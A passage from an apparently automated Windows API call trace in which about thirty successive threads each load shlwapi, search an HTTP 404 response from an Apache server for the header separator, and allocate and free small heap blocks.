LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.921] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.921] GetProcessHeap () returned 0x690000 [0296.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0296.922] GetProcessHeap () returned 0x690000 [0296.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0296.922] GetProcessHeap () returned 0x690000 [0296.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 477 os_tid = 0x1370 [0297.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.101] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.101] GetProcessHeap () returned 0x690000 [0297.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0297.101] GetProcessHeap () returned 0x690000 [0297.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0297.101] GetProcessHeap () returned 0x690000 [0297.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 478 os_tid = 0x1378 [0297.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.367] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.367] GetProcessHeap () returned 0x690000 [0297.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0297.367] GetProcessHeap () returned 0x690000 [0297.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0297.367] GetProcessHeap () returned 0x690000 [0297.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 479 os_tid = 0x1300 [0297.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.561] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.561] GetProcessHeap () returned 0x690000 [0297.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0297.562] GetProcessHeap () returned 0x690000 [0297.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0297.562] GetProcessHeap () returned 0x690000 [0297.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 480 os_tid = 0x5f4 [0297.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.765] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.765] GetProcessHeap () returned 0x690000 [0297.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0297.765] GetProcessHeap () returned 0x690000 [0297.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0297.765] GetProcessHeap () returned 0x690000 [0297.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 481 os_tid = 0x598 [0297.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.960] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.960] GetProcessHeap () returned 0x690000 [0297.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0297.960] GetProcessHeap () returned 0x690000 [0297.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0297.960] GetProcessHeap () returned 0x690000 [0297.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 482 os_tid = 0x590 [0298.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.152] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.152] GetProcessHeap () returned 0x690000 [0298.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0298.152] GetProcessHeap () returned 0x690000 [0298.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0298.152] GetProcessHeap () returned 0x690000 [0298.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 483 os_tid = 0x7c0 [0298.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.336] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.336] GetProcessHeap () returned 0x690000 [0298.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0298.336] GetProcessHeap () returned 0x690000 [0298.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0298.336] GetProcessHeap () returned 0x690000 [0298.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 484 os_tid = 0x52c [0298.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.534] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.535] GetProcessHeap () returned 0x690000 [0298.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0298.535] GetProcessHeap () returned 0x690000 [0298.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0298.535] GetProcessHeap () returned 0x690000 [0298.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 485 os_tid = 0x2a4 [0298.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.771] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.771] GetProcessHeap () returned 0x690000 [0298.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0298.771] GetProcessHeap () returned 0x690000 [0298.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0298.771] GetProcessHeap () returned 0x690000 [0298.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 486 os_tid = 0xa4c [0298.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.949] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.949] GetProcessHeap () returned 0x690000 [0298.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0298.949] GetProcessHeap () returned 0x690000 [0298.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0298.949] GetProcessHeap () returned 0x690000 [0298.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 487 os_tid = 0xa88 [0299.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.185] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.185] GetProcessHeap () returned 0x690000 [0299.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0299.185] GetProcessHeap () returned 0x690000 [0299.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0299.185] GetProcessHeap () returned 0x690000 [0299.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 488 os_tid = 0xa48 [0299.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.358] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.358] GetProcessHeap () returned 0x690000 [0299.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0299.358] GetProcessHeap () returned 0x690000 [0299.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0299.358] GetProcessHeap () returned 0x690000 [0299.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 489 os_tid = 0xa28 [0299.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.547] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.547] GetProcessHeap () returned 0x690000 [0299.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0299.547] GetProcessHeap () returned 0x690000 [0299.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0299.547] GetProcessHeap () returned 0x690000 [0299.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 490 os_tid = 0x734 [0299.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.727] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.728] GetProcessHeap () returned 0x690000 [0299.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0299.728] GetProcessHeap () returned 0x690000 [0299.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0299.728] GetProcessHeap () returned 0x690000 [0299.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 491 os_tid = 0x13b8 [0299.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.951] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.951] GetProcessHeap () returned 0x690000 [0299.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0299.951] GetProcessHeap () returned 0x690000 [0299.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0299.951] GetProcessHeap () returned 0x690000 [0299.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 492 os_tid = 0x1704 [0301.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0301.972] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.972] GetProcessHeap () returned 0x690000 [0301.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0301.972] GetProcessHeap () returned 0x690000 [0301.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0301.973] GetProcessHeap () returned 0x690000 [0301.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 493 os_tid = 0x14a0 [0302.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.664] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.664] GetProcessHeap () returned 0x690000 [0302.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0302.664] GetProcessHeap () returned 0x690000 [0302.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0302.664] GetProcessHeap () returned 0x690000 [0302.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 494 os_tid = 0x144c [0302.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.862] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.862] GetProcessHeap () returned 0x690000 [0302.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0302.862] GetProcessHeap () returned 0x690000 [0302.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0302.862] GetProcessHeap () returned 0x690000 [0302.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 495 os_tid = 0x14b0 [0303.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.047] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.047] GetProcessHeap () returned 0x690000 [0303.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0303.047] GetProcessHeap () returned 0x690000 [0303.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0303.048] GetProcessHeap () returned 0x690000 [0303.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 496 os_tid = 0x1498 [0303.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.262] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.263] GetProcessHeap () returned 0x690000 [0303.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0303.263] GetProcessHeap () returned 0x690000 [0303.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0303.263] GetProcessHeap () returned 0x690000 [0303.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 497 os_tid = 0x14a8 [0303.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.479] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.479] GetProcessHeap () returned 0x690000 [0303.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0303.479] GetProcessHeap () returned 0x690000 [0303.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0303.479] GetProcessHeap () returned 0x690000 [0303.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 498 os_tid = 0x14c0 [0303.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.682] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.682] GetProcessHeap () returned 0x690000 [0303.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0303.682] GetProcessHeap () returned 0x690000 [0303.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0303.682] GetProcessHeap () returned 0x690000 [0303.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 499 os_tid = 0x1454 [0304.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.174] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.174] GetProcessHeap () returned 0x690000 [0304.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0304.174] GetProcessHeap () returned 0x690000 [0304.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0304.175] GetProcessHeap () returned 0x690000 [0304.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 500 os_tid = 0x14c8 [0304.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.388] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.388] GetProcessHeap () returned 0x690000 [0304.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0304.388] GetProcessHeap () returned 0x690000 [0304.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0304.388] GetProcessHeap () returned 0x690000 [0304.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 501 os_tid = 0x430 [0304.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.626] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.626] GetProcessHeap () returned 0x690000 [0304.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0304.626] GetProcessHeap () returned 0x690000 [0304.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0304.627] GetProcessHeap () returned 0x690000 [0304.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 502 os_tid = 0xc44 [0304.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.818] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.818] GetProcessHeap () returned 0x690000 [0304.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0304.818] GetProcessHeap () returned 0x690000 [0304.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0304.818] GetProcessHeap () returned 0x690000 [0304.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 503 os_tid = 0x22c [0305.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.014] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.014] GetProcessHeap () returned 0x690000 [0305.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0305.014] GetProcessHeap () returned 0x690000 [0305.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0305.014] GetProcessHeap () returned 0x690000 [0305.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 504 os_tid = 0x137c [0305.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.212] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.212] GetProcessHeap () returned 0x690000 [0305.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0305.212] GetProcessHeap () returned 0x690000 [0305.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0305.212] GetProcessHeap () returned 0x690000 [0305.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 505 os_tid = 0x238 [0305.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.359] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.359] GetProcessHeap () returned 0x690000 [0305.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0305.359] GetProcessHeap () returned 0x690000 [0305.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0305.359] GetProcessHeap () returned 0x690000 [0305.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 506 os_tid = 0x3c4 [0305.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.594] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.594] GetProcessHeap () returned 0x690000 [0305.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0305.594] GetProcessHeap () returned 0x690000 [0305.594] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0305.594] GetProcessHeap () returned 0x690000 [0305.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 